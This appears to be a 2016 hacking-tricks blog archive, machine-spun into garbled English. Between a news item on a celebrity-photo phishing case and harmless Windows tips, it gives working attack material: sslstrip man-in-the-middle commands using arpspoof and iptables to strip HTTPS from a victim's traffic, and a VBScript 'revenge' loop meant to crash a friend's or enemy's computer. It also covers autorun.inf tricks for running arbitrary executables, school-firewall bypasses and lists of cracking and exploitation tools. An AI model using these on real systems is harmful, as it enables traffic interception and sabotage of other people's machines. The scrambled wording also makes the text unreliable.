Wednesday, 27 July 2016

Celebrity hacker who stole bare pictures gets six months in jail

Andrew Helton from Oregon conceded to hacking celebs' messages and taking express pictures prior this year. Presently, District Judge John A. Kronstadt has sentenced him to six months in jail and two years of regulated discharge. As indicated by Assistant United States Attorney Stephanie S. Christensen, the respondent "focused on, goaded and snared big names, as well as associates with phishing messages for more than two years. He likewise kept the bare and personal photographs he stole in his own particular PC. Helton's superstar casualties stay anonymous, on the grounds that the hotspot for that gigantic naked photograph release named as "The Fappening" was another hacker inside and out.


Ryan Collins, a Pennsylvania local, additionally conceded that he phished big names and stole express pictures not long ago. The pictures he stole, including those of Jennifer Lawrence and Kate Upton, were the ones that were dispersed on the web. Helton's case went before Collins' - he was captured in 2013 - and powers trust his gathering was in any event never made open.

While Christensen battled for a year-long sentence, Helton's legal counselor said his customer shouldn't be sent to jail by any means. He contended that the respondent was experiencing an emotional instability amid the season of the occurrence and just utilized the most fundamental phishing method. Helton conveyed messages that appeared as though they were from Apple and Google, requesting that the casualties confirm their records by tapping on a connection that prompted a fake site. "There was no skill included. Everything I did was basically duplicate and glue," the respondent said, serving as an update that we should give careful consideration to the connections we click.

Step by step instructions to Break SSL Protection Via MITM Attack With SSLStrip Tool

sslstrip is a MITM instrument that executes Moxie Marlinspike's SSL stripping assaults. It requires Python 2.5 or more current, alongside the "curved" python module.

To begin with Requirements:

Run Python

The python "curved web" module (well-suited get introduce python-bent web)

Setup

Unload: tar zxvf sslstrip-0.5.tar.gz

Introduce turned: sudo able get introduce python-bent

>>> How to Run >>>

Flip your machine into sending mode.

reverberation "1" >/proc/sys/net/ipv4/ip_forward

Setup iptables to divert HTTP movement to sslstrip.

iptables - t nat - A PREROUTING - p tcp - destination-port 80 - j REDIRECT - to-port <listenPort>

Run sslstrip.

sslstrip.py - l <listenPort>

Run arpspoof to persuade a system they ought to send their movement to you.

arpspoof - i <interface> - t <targetIP> <gatewayIP>

At the point when ARPspoof begin catching movement then SSL strip got to be achievement utilize the accompanying summon.

sslstrip - l 8080

Presently sort facebook.com or Google.com into your program and open these sites without Https. It will be open http://google.com :P

Appreciate!

Download SSLStrip
https://github.com/moxie0/sslstrip


Tuesday, 26 July 2016

Sign Up and Earn $25




                                                      Click On The Image 




Hack Your School Wifi

In this computerized period, verging on each spot have a web association. It can be either Wi-Fi or broadband. Correspondingly, in schools, you can discover WiFi so instructors can tech understudies over the web, and school WiFi can be utilized for getting more data as well. On the off chance that you need to watch motion pictures on the web, then you can utilize netflix records and passwords said on this site. In this day and age, you can see brilliant classes are assuming control, where educators used to tech kids by utilizing web. Presently there are a few things that each school have is firewall security or Wi-Fi secret word on their web with the goal that they can limit access to the web for all understudies and staff.

Presently there are a few schools which permits understudies and instructors to utilize school Wi-Fi yet have limitation over informal communication destinations like Facebook, YouTube, Twitter and so on and you are permitted to visit just few locales. You can likewise utilize zbigz record to change over deluge documents into direct download joins. It's great, however there comes commonly when you need to peruse whatever other site, yet can't as it is obstructed by school Wi-Fi, so you wind up with nothing. Try not to stress as you can hack school wifi to access blocked sites. Yes, that is conceivable, you can hack school wi-fi all alone. Here in this post I am going to let you know about how to hack school wifi and use it without being gotten. Yes, there are various courses accessible over the web, which can be utilized to hack into school wifi effortlessly. Do you realize that you can use underneath specified strides for hacking school WiFi Firewall in Windows 7/8/8.1/10/XP.
Do take note of that hacking into school wifi is not prescribed and this post demonstrates to hack school wifi just for instructive purposes
There are different strategies accessible to hack school wifi, yet here in this post I am going to let you know about how to unblock school WiFi in most effortless way.


PD Proxy (PC), DroidVPN (Android) 

On the off chance that you are still not ready to hack school wifi utilizing OpenVPN, then you can experiment with its best option, PD-Proxy. PD-Proxy is simply one more VPN administration which is being utilized by individuals everywhere throughout the world. It permits you to peruse web secretly, and gives you distinctive alternatives to visit each blocked webpage. The main downside of PD-Proxy is that it is constrained to 100 Mb for every day. The following are ventures for associating with Pd-Proxy.

Go to www.pdproxy.com and register with your email id. When you have entered your data accurately, you will get your username and secret key in email.

Open the pd-intermediary application and enter your username and secret word.

PD-Proxy VPN Unblock School Firewall

Click on associate catch, then it will upgrade the steering table and sets and ip interface

After a couple seconds,it will show a message expressing that "Effectively associated with server".Now begin surfing your most loved locales with full get to.


Through Open VPN 

OpenVPN is an open-source programming that utilizations VPN (virtual private system) to make association amongst client and site. OpenVPN is accessible for PC, MAC, Android and iOS gadgets. Among all intermediary servers, this VPN is most prescribed one. Another fortunate thing about this VPN is that it have a large portion of its servers in US,UK and Europe, you can interface with any of them to get to blocked sites. You can likewise do geometry dash full form download. Do you realize that you can likewise hack school WiFi with android telephones, iPhone utilizing open VPN as a part of android mobiles or iPhones. It is perfect for cell telephones (Android, iPhone (iOS) and Windows ) and I have tried it in my cellular telephones.

https://openvpn.net/index.php/open-source/downloads.html

Once downloaded, and introduced, open it. When you will open this application, you will see a screen like this underneath.

Presently you need to tap on any server like Euro Udp-53 and Euro Udp-81. In the event that you are not ready to discover any servers to unblock school firewall, then you will need to download a few servers from Google. Once downloaded, then you will need to tap on + sign close Connection Profiles to include a few servers from your downloaded servers. Presently you will need to enter username and watchword on OpenVPN application to make it work. Use username and secret key specified beneath.Click on the "Associate" catch at the right base. Your Open VPN Server will be associated and appreciate full web access.


Sunday, 24 July 2016

Make Symbols with keyboard

Step by step instructions to MAKE SYMBOLS WITH KEYBOARD

Alt + 0153..... ™... trademark image

Alt + 0169.... ©.... copyright image

Alt + 0174..... ®....registeredtrademark image

Alt + 0176 ...°......degree image

Alt + 0177 ...±....plus-or-short sign

Alt + 0182 ...¶.....paragraph mark

Alt + 0190 ...¾....fraction, three-fourths

Alt + 0215 ....×.....multiplication sign

Alt + 0162...¢....thecent sign

Alt + 0161.....¡......upside down outcry point

Alt + 0191.....¿.....upside down question mark

Alt + 1...........smiley face

Alt + 2 ......?.....black smiley face

Alt + 15.....¤.....sun

Alt + 12......?.....female sign

Alt + 11.....?......male sign

Alt + 6.......?.....spade

Alt + 5.......?......Club

Alt + 3............. Heart

Alt + 4.......?......Diamond

Alt + 13......?.....eighth note

Alt + 14......?......beamed eighth note

Alt + 8721.... ?.... N-ary summation (auto entirety)

Alt + 251.....v.....square root check mark

Alt + 8236.....8.....infinity

Alt + 24.......?.....up bolt

Alt + 25......?......down bolt

Alt + 26.....?.....right bolt

Alt + 27......?.....left bolt

Alt + 18.....?......up/down bolt

Alt + 29......?... left right bolt

Try it out !!

Tuesday, 19 July 2016

Trojans

How Trojans work ... in Real

RATs (Remote Access Trojans) are vindictive damaging projects that run undetectably on casualty PCs and license a gatecrasher control remotely. Gatecrashers for the most part tie Trojan steeds in amusements and other little projects that clueless clients then execute on their PCs. Misused clients either download or then execute these upon deceived.

RATs come in #client and #server parts. Programmers dispatch the server program on a casualty's machine by restricting the introducing segment to some other authentic project. In the wake of characterizing the server executable's conduct, the gatecrasher produces the system, deceiving the host machine's proprietor into running it, where the programmer makes his own PC the customer side.

Symptoms of Trojan

RATs can erase and alter records, organize hard circles, transfer and download documents and do a large group of different exercises.

To begin with, the capacity to catch each screen and keystroke implies that interlopers can assemble clients' passwords, registry ways, drive mappings, medicinal records, financial balance and Visa data, and individual correspondences. On the off chance that we have a WebCam, numerous RATs can turn it on and catch recordings! Famously known as web-cam hacking.

Distinguishing and Removing RATs

A noteworthy test is recognition and evacuation of RATs. Run of the mill antivirus scanners are more averse to recognize RATs than worms or infections on account of folios and interloper encryption schedules. Additionally, RATs can possibly bring about altogether more harm than a worm or infection can bring about.

Aside from the way that an antivirus scanner can identify and erase these Trojans, its not completely ensured. A portion of the prevalent programming projects to battle Trojans are –

#Malwarebytes Anti-malware , #SpyHunter and #Trojan Killer.

Additionally the best tip is the way that clients ought to never tap on suspicious records from obscure senders or download and separate any sort of email connections without appropriately judging the kind of substance it might have,as it is said Prevention is better then cure..

Offer this data with your companions and partners for mindfulness and better security..

Monday, 18 July 2016

Programmed PC Shutdown utilizing CMD Prompt 

1. Open Run, press Windows + R what's more, sort CMD to open the Order Prompt. 

2. Presently sort the underneath laud by supplanting the last numeric number with the quantity of seconds after which you need to be closed down. 

shutdown.exe –s –f –t 3600 

1. Presently 3600 Seconds mean 1 

hour, so you can twofold these 

digits with the quantity of 

hours you need after which 

your PC shutdown.

Hacking World Common Terms You Should Know

1#DDoS: DDoS implies Distributed Denial of Service. This is a kind of DOS assault in which numerous traded off frameworks are utilized and these frameworks are regularly tainted with a Trojan. All these contaminated frameworks select an objective and cause a Denial of Service (DoS) assault.

2# VPS: It remains for Virtual private server (VPS) . It is a virtual machine that is sold as an administration by an Internet facilitating administration. A VPS for the most part runs its own particular duplicate of a working framework, and the clients have superuser-level access to that working framework occasion, so they can introduce any product that keeps running on that OS.

3# SE: Social designing is an assault vector that depends vigorously on human communication and regularly includes deceiving individuals into breaking ordinary security methodology.

4# HTTP: The Hypertext Transfer Protocol (HTTP) is an application convention for collective, conveyed, hypermedia data frameworks. HTTP is the premise of information correspondence for the World Wide Web. The part Hypertext is an organized content that makes utilization of legitimate connections (hyperlinks) between hubs containing content.


5# SSH: Secure Shell( SSH) is a cryptographic i.e, encoded system convention that works at layer 7 of the OSI Model. It permits remote login and other system administrations to work secury over an unsecured system. In basic words, SSH is utilized to associate with Virtual Private Servers.

6# FTP: The FTP or File Transfer Protocol is a standard system convention that is utilized to exchange documents between a customer and server utilizing a PC system.

7# XSS (CSS): Cross-webpage scripting or XSS is a kind of PC security powerlessness normally found in web applications. This helplessness permits programmers to infuse customer side script into website pages which are seen by different clients.


8# Script Kiddie: A Skiddie or Script Kiddie is an incompetent person who utilizes projects or scripts created by different programmers to assault systems and PC frameworks even to mutilate sites.

8# VPN: A Virtual Private Network or VPN helps in broadening a private system over an open system, for example, Internet. It permits the clients to send and get information crosswise over open or shared systems simply like their processing gadgets are straightforwardly associated with the private system. Consequently this advantage from the security, usefulness and administration arrangements of the private system.

10# Nix: Nix is an intense bundle director for Linux and other Unix based frameworks that make bundle administration reproducible and dependable. It gives one next to the other establishment of numerous variants of a bundle, nuclear updates and rollbacks, simple setup of fabricate situations and multi-client bundle administration.

11# SQL: Structured Query Language or SQL is a unique reason programming dialect intended for overseeing information contained in a social database administration framework (RDBMS), or notwithstanding for stream preparing in a social information stream administration framework or RDSMS.

12# FUD: Fully imperceptible or FUD so, can remain for information that had been scrambled, making it have all the earmarks of being irregular clamor. This term is utilized as a part of programmer circles to allude something as a perfect programming to numerous against infections yet contain some sort of hacking device inside it.

13# LOIC/HOIC: The Low Orbit/High Orbit Ion Cannon, frequently shortened to LOIC/HOIC. It is an open source foreswearing of-administration assault and system stress testing application written in BASIC and is intended to assault upwards of 256 URLs at once.

14# Trojan: A Trojan or Trojan stallion is a kind of malware that camouflages itself as a honest to goodness programming. these Trojans can be utilized by programmers and digital cheats attempting to access clients' frameworks. Clients are normally deceived into stacking and executing Trojans on their frameworks.

15# Botnet: A botnet (otherwise called a zombie armed force) is various Internet PCs that, in spite of the fact that their proprietors are unconscious of it, have been set up to forward transmissions (counting spam or infections) to different PCs on the Internet.

16# SQL Injection: SQL infusion is a popular code infusion strategy, usually to assault information driven applications.In this assault, pernicious SQL explanations are embedded into a passage field for execution.


17# Root: Root is the Highest consent level on a PC that permits the client to change anything on the framework without a solitary limitation.

18# Warez: Warez is copyrighted works conveyed without charges or eminences, and might be exchanged, by and large, infringement of copyright law. Warez are by and large unapproved discharges by sorted out gatherings, rather than record sharing between companions or vast gatherings of individuals with comparable enthusiasm utilizing a darknet. Warez are not typically business programming falsifying.

19# White Hat Hacker: A white cap programmer is a PC security master ( moral programmer ) who breaks into secured frameworks and systems to test and survey their level of security. These are the great folks in the hacking group and utilize their abilities and learning to enhance security by uncovering vulnerabilities before a malignant programmer (otherwise called dark cap programmers) recognizes and misuses them.

20# Black Hat Hacker: A dark cap programmer is a person with great PC learning and with a sole reason to sidestep or break web security for pernicious reasons. Dark cap programmers are otherwise called dim side programmers or wafers. These are the folks with whom White cap programmers need to battle constantly.

21# Gray Hat Hacker: The term Gray Hat programmer alludes to a PC programmer or PC security master who now and again disregard laws or run of the mill moral benchmarks, for individual purposes yet don't have the noxious expectations like a run of the mill dark cap programmer.


22# Rootkit: A rootkit is a surreptitious PC program intended to give proceeded with favored access to a PC while effectively concealing its nearness. The term rootkit is an association of the two words "root" and "unit". This sort of infection can be effortlessly expelled by booting the PC in experimental mode.

23# Ring0: Very difficult to expel and exceptionally uncommon in the wild, these can oblige you to organization, it's difficult to evacuate certain ring0 rootkits without experimental mode.

24# IP Grabber: IP Grabber is a connection that gets casualty's IP when they visit it the specific web address.

25# Malware: "Malware" is an umbrella term used to allude to an assortment of types of threatening or meddling programming, including PC infections, worms, trojan steeds, ransomware, spyware, adware, scareware, and different malignant projects. It can take the type of executable code, scripts, dynamic substance, and other programming.

26# Phreak: Phreak is a slang term begat to portray the movement of a society of individuals who try different things with, investigate, or study, telecom frameworks. Phreaker, phreak, or telephone phreak are names usually for and by people who partake in phreaking.

27# DOX: Doxing or doxxing, is the Internet-based routine of looking into and TV by and by identifiable data around a person. The techniques utilized to obtain this data incorporate seeking openly accessible databases and online networking sites (like Facebook), hacking, and social designing. It is firmly identified with web vigilantism and hacktivism. Doxing might be completed for different reasons, including to help law requirement, business examination, blackmail, compulsion, badgering, web disgracing and vigilante equity.

28# Worm: A PC worm is a standalone malware PC program that reproduces itself with a specific end goal to spread to different PCs. Frequently, it utilizes a PC system to spread itself, depending on security disappointments on the objective PC to get to it. Not at all like a PC infection, it doesn't have to connect itself to a current project.

29# Deface: A site ruin is an assault on a website that progressions the presence of the webpage or a specific site page or in fact when a programmer replaces the list record with their own particular one.

30# Keylogger: Keylogger is a PC program that records each keystroke made by a PC client, particularly keeping in mind the end goal to increase deceitful access to passwords and other private data.

31# RAT: A remote organization apparatus (RAT) is a bit of programming that permits a remote "administrator" to control a framework as though he has physical access to that framework. While desktop sharing and remote organization have numerous lawful uses, "Rodent" programming is typically connected with criminal or malevolent movement.

Cool Notepad Tricks

Cool Notepad traps
*****************

1.Make Notepad A Diary

Open Notepad, sort .LOG in

capitals and press Enter, save the

document. Presently at whatever point you open the

document, you will discover the date and

time embedded.


2..9/11 Attack Trick

An astonishing trap that will take off

you hypnotized. Call this trap a

incident or whatever yet

stunning it most likely is.

Open notebook and sort Q33NY

with Caps on

Change text dimension to 72 and textual style to Windings
Get Amazed

The name of the plane that

assaulted world exchange focus was

Q33NY…


3.DVD – Drive Force pop out

· Open Notepad

· Copy and glue the

Code given underneath into

your Notepad

[Author Info]

Set oWMP = CreateObject

("WMPlayer.OCX.7?)

Set colCDROMs =

oWMP.cdromCollection

do

in the event that colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count – 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop[/Author Info]

Spare it with .vbs expansion like

Anything.vbs

Click on the document and open it, it will

power your DVD drive to popout.So

try not to utilize it On yourself attempt it on

your companions.

Live TV on Your PC For Free by simply utilizing a VLC player

Observe Live TV on Your PC For Free
Presently you can observe free Tv on your pc by simply utilizing a VLC player.

Step 1 : First of all you have to

have VLC player, on the off chance that you don't

have vlc player benevolent download

furthermore, introduce it

Step 2 : Now open Vlc Player,

furthermore, select gushing choice from

the media menu present in the

menu bar.

Step 3 : Select system choice

furthermore, enter the url of the

gushing channel. For instance

on the off chance that you need to see B4u Music

you have to include url

rtsp://217.146.95.166:554/playlist/

ch12zqcif.3gp

in the url field and after that select

play choice from the stream

drop down menu.

Step 4 : After you click play in

the above stride, the channel will

begin gushing and you can

watch your most loved channels.

Here is the List of numerous other

channels which you will love to

observe

Channel Name

Join

NDTV rtsp://

ss1c6.idc.mundu.tv:554/prf0/

cid_33.sdp

NDTV Profit rtsp://

ss1c6.idc.mundu.tv:554/prf0/

cid_31.sdp

Times Now rtsp://

ss1c6.idc.mundu.tv:554/prf0/

cid_2.sdp

Aaj Tak rtsp://

ss1c6.idc.mundu.tv:554/prf0/

cid_4.sdp

CNBC Aawaz rtsp://

ss1c6.idc.mundu.tv:554/prf1/

cid_34.sdp

CNBC TV 18 rtsp://

ss1c6.idc.mundu.tv:554/prf0/

cid_35.sdp

Features Today rtsp://

ss1c6.idc.mundu.tv:554/prf0/

cid_7.sdp

NDTV 24×7 rtsp://

ss1c6.idc.mundu.tv:554/prf0/

cid_29.sdp

NK News rtsp://94.75.250.53:554/

rtplive/rknews.sdp

RAJ News

rtsp://94.75.250.220:1935/live/

rajnews2.sdp

ETV rtsp://94.75.250.53/rtplive/

etv2low.sdp

Studio N

rtsp://94.75.250.220:1935/live/

studion2

SVBC rtsp://94.75.250.220/

rtplive/svbclow

Zoo Vision rtsp://

stream.zoovision.com/live.sdp

B4u Music

rtsp://217.146.95.166:554/playlist/

ch12zqcif.3gp

iMusic rtsp://217.146.95.166:554/

playlist/ch26yqcif.3gp

Zee Tamil

rtsp://121.244.145.226:554/prf1/

cid_54.sdp

Zee Kannad

rtsp://121.244.145.226:554/prf1/

cid_55.sdp

Zee Bangla

rtsp://121.244.145.226:554/prf1/

cid_52.sdp

Music Box rtsp://stream.the.sk/

live/musicbox/musicbox-3m.3gp

Bella Tv

rtsp://217.146.95.166:554/playlist/

ch29yqcif.3gp

Style Tv

rtsp://217.146.95.166:554/playlist/

ch27yqcif.3gp

Experience rtsp://

video3.multicasttech.com/

AFTVAdventure3GPP296.sdp

Frightfulness rtsp://

video2.multicasttech.com/

AFTVHorror3GPP296.sdp

Comic drama rtsp://

video3.multicasttech.com/

AFTVComedy3GPP96.sdp

Exemplary rtsp://

video3.multicasttech.com/

AFTVClassics3GPP296.sdp

Wrongdoing rtsp://

video2.multicasttech.com/

AFTVCrime3GPP296.sdp

Secret rtsp://

video2.multicasttech.com/

AFTVMystery3GPP296.sdp

Clubbing Tv

rtsp://217.146.95.166:554/playlist/

ch21yqcif.3gp
Hack PC Admin Password From User Mode!
...................................

Take after these strides:

1. Open summon brief (Start->Run->cmd),

2. Enter the accompanying summon, then press ENTER

3. Enter the followin summon, then press ENTER:> compmgmt.msc

This ought to open the PC administration console.

4. Go to neighborhood clients and gatherings >users. Right tap on any client and select "set secret key".

Than set you new secret word there

Clean Your Ram Memory With Notepad (.vbs) file

The most effective method to Clean Your Ram Memory....!!!


You may perceive that your framework gets slower and slower when playing and working a considerable measure with your PC. That is cause your RAM is loaded with outstanding advancement pieces u needn't bother with any more.

So make another content document on your desktop and call it ... "RAMcleaner" or something...

Sort:

FreeMem=Space(64000000)

in this document and spare it as RAMcleaner.vbs [ You may pick the "All Files" alternative when u spare it ]

Run the record and your RAM might be cleaned :>

Obviously u can alter the code in the document for a more prominent "cleaning-progress"..

FreeMem=Space(1280000000)

Create undeletable folders

The most effective method to Create Undeletable And Unrenamable Folders ?

Step1. Go to Start and afterward Click on Run

- Type cmd and hit enter (To open Command Prompt ).

Step2. Recall that you can't make Undeletable and

unrenamable organizer in your root registry (i.e. where the

windows is installed) That implies you can't make this

sort of organizer in C: drive on the off chance that you introduced windows on C:

Step3. Sort D: or E: and hit enter

Step4. Sort md con\ and hit enter (md - make registry)

Step5. You may utilize different words, for example, aux, lpt1, lpt2, lpt3

up to lpt9 rather than con in above stride.

Step6. Open that catalog, you will see the organizer made of

name con.

Step7. Attempt to erase that envelope or rename that organizer windows

will demonstrate the mistake message.

Presently the inquiry is the means by which to erase it when you truly

need to do?

1. Open Command Prompt

2. Sort D: ( if u made this kind of envelope in D: drive) and

hit enter Type rd con\ (rd - remove registry)

3. Open that catalog and the envelope won't show up

since it is evacuated.


Cyber Security:You All will love this video


Hide Your Secret Files Inside An Image:Tutorial with screenshots

Today we are going to share a portion of the astounding PC trap with you which is identified with your Windows PC, the trap is truly astonishing and a bit trick with your companions on the off chance that you need to. 
In this instructional exercise we are going to make a picture record which will look like basic picture yet when you right tap on it and select open as WinRAR Archiver then you will have the capacity to see numerous documents which are covered up inside the picture and nobody can comprehend that how amazingly you are concealing these records in pictures. 
So would it be advisable for us to begin? prior to the begin, I should finish up one thing, and that is, you may not comprehend the entire strides so on the off chance that you are stuck in any of these strides then don't hesitate to ask utilizing underneath remark box. 
>> Please Do as what we are appearing by pictures, don't go for another area or drives. Utilize just C drive as we are utilizing, later on, you can utilize any drive in the wake of getting caught on. Experience the pictures as well! Ventures to conceal your mystery documents inside any Image! 
1. At first from the desktop make an organizer, name it CodingSec and afterward put a few documents. (For Example; put three music documents) 
2. Presently assume in the event that you chose any three then pack those three documents utilizing WinRAR(see picture). When you made a RAR document name it as CodingSec.




 3. Presently simply put one picture as I had done, name it as Logo.jpg (record must be in JPG position). That is everything done! Exit from that Folder. 

Step4. Presently Open CMD as Command Prompt from Start Type CMD hit enter. Presently begin writing as beneath recorded, see picture additionally for better understanding. 

Type1: compact disc Desktop\CodingSec 
Type2: duplicate/b Logo.jpg + CodingSec.rar Logo.jpg 
Hit Enter 
Type3: exit

You just made a picture document that contains all the three records yet not obvious to anybody until and unless you open that picture document utilizing WinRAR Archiver.

On the off chance that you don't see your WinRAR Archiver then Choose Default Programs and Browse it to the Bottom of the Windows you can see WinRAR and from that point double tap to make that empower and open from that document. 
Presently you can see that your Image record size is expanded (See Image).you can move that file to any location of the computer.

Control Windows Using Xbox 360 Controller

There are numerous Xbox players who are looking for the utilization of their controller on their Windows PC yet today's instructional exercise is particularly for them, you can utilize your Xbox 360 controller to control PC screen yet simply require an uncommon programming that we have recorded beneath.

We as a whole know the utilization and the enjoyment of utilizing Xbox 360 controller, you can play your PC amusements utilizing Xbox controller, simply require 360 cushion, the general strides are anything but difficult to take after. On the off chance that having any uncertainty in this instructional exercise then don't hesitate to ask utilizing the beneath remark box. Appreciate!

1. Go to your PC and open your wanted web program to download an application called Gopher 360, download it from its authority GitHub site.

2. Subsequent to downloading, go to your download organizer and right tap on Gopher.exe and snap on Run As Administrator. (Continuously run the application utilizing Rus As Administrator)


3. After Gopher.exe introduced on your PC you have to plug your 360 controllers and soon you will see a blue screen realistic with some kind of subtle elements.
In the event that you need itemizing to utilize this product alongside the controller 360 – then you ought to come to the GitHub official page from where you have downloaded the application. 
The capacity of the Controller 360! 

The controller 360 essentially a mouse yet you have to see some fundamental capacities that will perform by your Controller 360. Catch An and X are utilized as Left and Right snap, the right wheel is utilized as your mouse scrolls and the left simple is sit still in some way or another. 

On the off chance that you utilize LB then you can flip through three unique sensitivities as prescribed you should favor the lower which will help you to utilize Netflix with high affectability effectively. 

Catch Y and B ought to speak to the back and forward however rather than this B is attached up to enter for reasons unknown and Y is still nonprogrammed.


Sunday, 17 July 2016

Worst Revenge Trick

Wanna Take Revenge From Ur Friends Or Enemy

So attempt This Nd Crash It

This Will Crash Ur Computer

Alternative Explicit

Faint WSHShell

Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x

For x = 1 to 100000000

WSHShell.Run "startTour.exe"

Next

Spare It As Anything.vbs

It Only Works With Windows XP

Instructional exercises on making Autorun.inf documents

Hello everyone ! Here is the most smoking thing for everybody. You more likely than not seen a few applications changing the symbols for your drive or you have recently seen that at whatever point you embed any compact disc/dvd into the drive, without doing anything, an application begins executing that can be any blaze record or can be any html document. DO you know how it happens? It's only a straightforward little data document, which does the enchantment. It is named as "autorun.inf". This is the document which attempts to make any drive autorun. Yes , even you can make your pen drive auto run or can make autorun compact discs effortlessly.

Presently lets begin with the document substance of the autorun.inf

Open a scratch pad and begin composing the accompanying code in the notebook:

Code:

[autorun]

open=any_exe_or_batch_file

icon=any_icon_file_for_your_drive

Label=name_of_the_drive

I have said the fundamentals of the autorun.inf and there are some best in class things you can do with the autorun.inf. Like you can make your own orders for the right tap on your drive.

Code:

shell/custom_option/command="any_exe_or_batch_file_to_run"

for instance, you can reset the work of "investigate" capacity of the right snap menu on the drive.

Assume you need to execute a document at whatever point you right tap the drive and select the alternative "explore",then the summon would be as per the following:

Code:

shell/investigate/command="desired_exe_file"

In the event that you need to make any custom occasion then the code would be as per the following:

Code:

shell/my_event/command="any_exe_or_batch_file"

One alternative thing more can be done.Instead of utilizing "open" code, we can utilize another catchphrase "shellexecute". all things considered the code will be:

Code:

shellexecute="any_exe_or_batch_file"

Note : File must be spared as "autorun.inf" and ought to be put away at the foundation of the drive.Second thing Open occasion will work, at whatever point you double tap the drive to open for settled drives though on account of removable drives, when you embed the drive,Open occasion will work.

Attempt This Code Its Awesome

Gone ahead Talk With Computer

 > open notebook

 > copy the following code

CreateObject("SAPI.SpVoice").Speak"I cherish YOU"

- > n glue on the Notepad

- > save as > enjoy.vbs

- > double tap on it

Unlock your BlackBerry

Step by step instructions to open blackberry Mobiles

Firstly Goto menu go to Settings Menu

- > sim card pre-select.

1. While holding the SHIFT key, type

mepd

2. You ought to now see the five

locking classifications recorded.

3. Hold the ALT Key while writing in

MEPE or MEPD or MEPPE or MEPPD

( not case delicate ) (you won't

see content show up on screen while

writing )

4. Discharge the movement key.

5.You are presently incited to enter

the Network MEP code (it will likewise

state what number of endeavors left)

6. Enter the code

7. Enter Return/Enter

8. The gadget ought to be opened

VLC player Converter Trick

Individuals dependably utilize Video Converters for changing over recordings and stuff... These Converters 4/10 contain infections... Here is a Small Trick to Show to change over documents utilizing VLC MEDIA PLAYER WHICH everybody employments..

VLC player is prominent video player yet it is not only a video player it can likewise be utilized to change over video starting with one arrangement then onto the next organization. On the off chance that you don't have any video converter at this moment then no issue. Presently no compelling reason to download any video converter. You can do it utilizing VLC player here are some simple strides simply perused and tail them precisely to change over any video starting with one configuration then onto the next arrangement utilizing VLC player.

Step 1 First of all open VLC player.

Step 2 Now press CTRL+R after that beneath kind of screen will show up before you.

Step 3 Now Add any video which you need to change over.

Step 4 Click on Convert/Save and in next discourse select the organization in which you need to change over and save your video.

Step 5 Click on START and sit tight for quite a while.

That is it.

It's snappy and Easy too..!!

Attempt this.!

If it's not too much trouble Feel Free and Comment your Opinions


Some Windows Tricks

A few Tricks To Start With Win

Windows Game Secrets

1.Solitaire: Instant Win

Press Alt + Shift + 2 to right away win

2.Solitaire: Draw just 1 card (rather than 3)

Hold down Ctrl + Alt + Shift then tap on unopen cards to draw.

3. FreeCell : Instant Win

Hold down Ctrl + Shift + F10 while playing, then snap Abort.

Presently move one card.

4. FreeCell: Hidden Game Modes

Go to Game menu pick Select Game

Here you can browse diversion mode 1 to 1,000,000. In any case, - 1 and - 2 will likewise work (shrouded modes)

5. Hearts: Show All Card

Caution! this requires an alteration on your registry. Make sure you take after the strides precisely. Harm your registry may harm your Windows.

Open the "Registry Editor" by: "Begin" >> "Run" then sort "regedit" and press Enter

Grow to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts

Right-tap on the right board and make another String esteem with the name "ZB"

Double tap to open this key "ZB" to alter its worth. At that point enter "42" and close the Registry Editor.

Begin Hearts and Press Ctrl + Alt + Shift + F12 to demonstrate every one of the cards

6. Minesweeper: Stop The Timer

When you begin to play another diversion, the clock is ticking...

Press Windows Key + D to show desktop.

Presently return to the diversion by selecting it from the taskbar. The clock is ceased.

7. Pinball 

Boundless Balls: Type bmax at another diversion to get boundless balls (no warning).

Additional Balls: Type 1max at another diversion to get additional balls.

Gravity Well: Type gmax at another diversion to actuate Gravity Well.

Advancement: Type rmax at another diversion or while playing to get moment advancement and raising rank.

Additional focuses with halfway shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the main bar, you'll get 15,000 focuses, second: 30,000,...

Additional focuses with incomplete shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the main bar, you'll get 15,000 focuses, second: 30,000,...

Test Mode: Type shrouded test with another ball or new amusement. Presently you can utilize your mouse to drag and move the ball where you need.

Hacking Tools

Best Hacking Tools Every Hacker

Know

Remote Hacking: These are instruments

that help you hack into remote

systems. Remote hacking devices

despite the fact that helpful, don't make you a

complete programmer. With a specific end goal to accomplish

that, you should take in the diverse

routes in which a protected system can

be gotten to. Likewise, you ought to work

on making your own particular system as

secure as could reasonably be expected.

1. Aircrack-ng

2. Kismet

3. inSSIDer

4. KisMAC

Interruption Detection Systems:

Interruption location apparatuses are one of

the most vital part of any

security game plan. They permit

you to identify those dangers that are

conceivably perilous for your

framework.

1. Grunt

2. NetCop

Port Scanners

1. Nmap

2. Superscan

3. Irate IP Scanner

Encryption Tools: In an age where

more governments are

being discovered keeping an eye on their own

nationals, encryption is the expression of

the day. These apparatuses permit you to

scramble your information so that regardless of the fact that

somebody gets through, they

can't get to the information effortlessly.

1. TrueCrypt

2. OpenSSH

3. Putty

4. OpenSSL

5. Tor

6. OpenVPN

7. Stunnel

8. KeePass

Secret word Crackers: The name is

really simple for this situation.

These apparatuses help you recuperate

passwords from the information that a

PC framework is putting away or

transmitting over a system.

1. Ophcrack

2. Medusa

3. RainbowCrack

4. Wfuzz

5. Brutus

6. L0phtCrack

7. fgdump

8. THC Hydra

9. John The Ripper

10. Aircrack - Aircrack is 802.11 WEP

what's more, WPA-PSK keys breaking program.

11. Cain and Abel

Parcel Crafting: Packet making is

the procedure through which an

assailant discovers vulnerabilities or

passage focuses inside your firewall.

These instruments help you accomplish that

all the more effortlessly.

1. Hping

2. Scapy

3. Netcat

4. Yersinia

5. Enemy

6. Socat

Activity Monitoring: These are devices

that let you screen what sites

your representatives or kids are

observing.

1. Splunk

2. Nagios

3. P0f

4. Ngrep

Parcel Sniffers: These are instruments that

can permit you to catch and

envision the activity that is coming

on your site.

1. Wireshark

2. Tcpdump

3. Ettercap

4. dsniff

5. EtherApe

Defenselessness Exploitation: These are

the devices that you would use in

request to access different

places.

1. Metasploit

2. sqlmap

3. sqlninja

4. Social Engineer Toolkit

5. NetSparker

6. Hamburger

7. Dradis

The most effective method to Hack Wi-Fi WPA/WPA2 Password With Video Tutorial

***********************************

